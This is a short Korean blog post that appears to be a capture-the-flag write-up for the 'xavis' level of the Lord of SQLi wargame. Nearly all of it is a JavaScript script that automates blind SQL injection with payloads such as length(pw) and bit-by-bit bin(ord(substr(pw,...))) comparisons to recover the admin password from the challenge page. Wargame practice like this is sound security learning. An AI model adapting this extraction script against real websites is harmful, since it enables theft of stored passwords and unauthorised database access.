프로필사진

JIWON J1W0N

유니코드 Blind SQL Injection(JS)

WEB 2021. 7. 31. 13:47

728x90

 

반복문 도는게 조금 이상한데 이런식으로 하면 된다.

 

 with "los Xavis"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
const hack = async (url, cookies) => {
    let res = await fetch(encodeURI(url), {
        "headers" : {
            "accept""text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "accept-language""ko-KR,ko;q=0.9",
            "cookies" : cookies
        },
        "referrer""https://los.rubiya.kr/gate.php",
          "referrerPolicy""strict-origin-when-cross-origin",
          "body"null,
          "method""GET",
          "mode""cors",
          "credentials""include"
    }).then( (res) => {
        return res.text();
    });
 
    return res;
}
 
let pw_length = 0;
for(var i = 0; i < 100; i++){
    let res = await hack(`https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=1' or length(pw)=${i} -- ` , document.cookies)
    if(res.indexOf("<h2>Hello admin</h2>"!= -1){
        pw_length = i;
        break;
    }
}
console.log(`pw_length : ${pw_length}`)
 
 
 
let byte_length = 0;
for(var i = 1; i < 100; i++){
    let res = await hack(`https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=1' or length(bin(ord(substr(pw,1,1))))=${i} -- ` , document.cookies)
    if(res.indexOf("<h2>Hello admin</h2>"!= -1){
        byte_length = i;
        console.log(`byte_length : ${byte_length}`)
    }
}
 
 
let password = "";
let bit = "";
for(var i = 1; i <= pw_length; i++){
    for(var j = 1; j <= byte_length; j++){
        let res = await hack(`https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=1' or substr(lpad(bin(ord(substr(pw,${i},1))),${byte_length},0),${j},1)=1 -- `, document.cookies);
        if(res.indexOf("<h2>Hello admin</h2>"!= -1){
            bit += "1";
        } else {
            bit += "0";
        }
    }
    password += String.fromCharCode(parseInt(bit, 2));
    console.log(`[*] password : ${password}`);
    bit = "";
}
 cs
저작자표시 비영리 변경금지

'WEB' 카테고리의 다른 글

FIREBASE 관련 문제  (0) 2020.09.22
flask_caching  (0) 2020.09.15
XSS 정리 (추가 중)  (0) 2020.05.19
[XSS Challenge] write up  (1) 2020.04.22
[XSS GAME] write_up  (0) 2020.04.21

댓글
Powered by
Designed by 동건

티스토리툴바